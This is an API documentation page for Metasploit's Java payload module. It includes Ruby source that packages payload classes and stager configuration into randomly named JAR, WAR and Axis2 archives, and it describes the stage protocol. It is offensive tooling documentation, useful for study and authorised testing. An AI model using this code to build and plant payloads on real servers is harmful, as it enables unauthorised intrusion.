Module: Msf::Payload::Java

Included in:
BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Instance Method Summary collapse

Instance Method Details

#class_filesObject

Default to no extra class files


149
150
151
# File 'lib/msf/core/payload/java.rb', line 149

def class_files
  []
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String


34
35
36
# File 'lib/msf/core/payload/java.rb', line 34

def generate(opts={})
  generate_jar(opts).pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload's #stager_config method.

Parameters:

  • :app_name (Hash)

    a customizable set of options

Returns:

  • (Rex::Zip::Jar)

119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
# File 'lib/msf/core/payload/java.rb', line 119

def generate_axis2(opts={})
  raise if not respond_to? :stager_config

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_files(paths, MetasploitPayloads.path('java'))
  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(:app_name => app_name)

  zip
end

#generate_default_stage(opts = {}) ⇒ Object


20
21
22
23
24
25
26
27
28
29
# File 'lib/msf/core/payload/java.rb', line 20

def generate_default_stage(opts={})
  stage = ''
  stage_class_files.each do |path|
    data = MetasploitPayloads.read('java', path)
    stage << [data.length, data].pack('NA*')
  end
  stage << [0].pack('N')

  stage
end

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload's #stager_config method.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :main_class (String)

    the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

  • :random (Boolean)

    Set to `true` to randomize the "metasploit" package name.

Returns:

  • (Rex::Zip::Jar)

48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# File 'lib/msf/core/payload/java.rb', line 48

def generate_jar(opts={})
  raise if not respond_to? :stager_config
  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_files(paths, MetasploitPayloads.path('java'))
  jar.build_manifest(:main_class => main_class)

  jar
end

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

32-bit big endian length ][ first raw .class file

32-bit big endian length ][ Nth raw .class file
32-bit null

16
17
18
# File 'lib/msf/core/payload/java.rb', line 16

def generate_stage(opts={})
  generate_default_stage(opts)
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

  • opts (Hash) (defaults to: {})
  • :app_name (Hash)

    a customizable set of options


75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
# File 'lib/msf/core/payload/java.rb', line 75

def generate_war(opts={})
  raise if not respond_to? :stager_config
  zip = Rex::Zip::Jar.new

  web_xml = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  web_xml.gsub!(/NAME/, app_name)

  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end

#stage_class_filesObject

Default to no extra stage class files


154
155
156
# File 'lib/msf/core/payload/java.rb', line 154

def stage_class_files
  []
end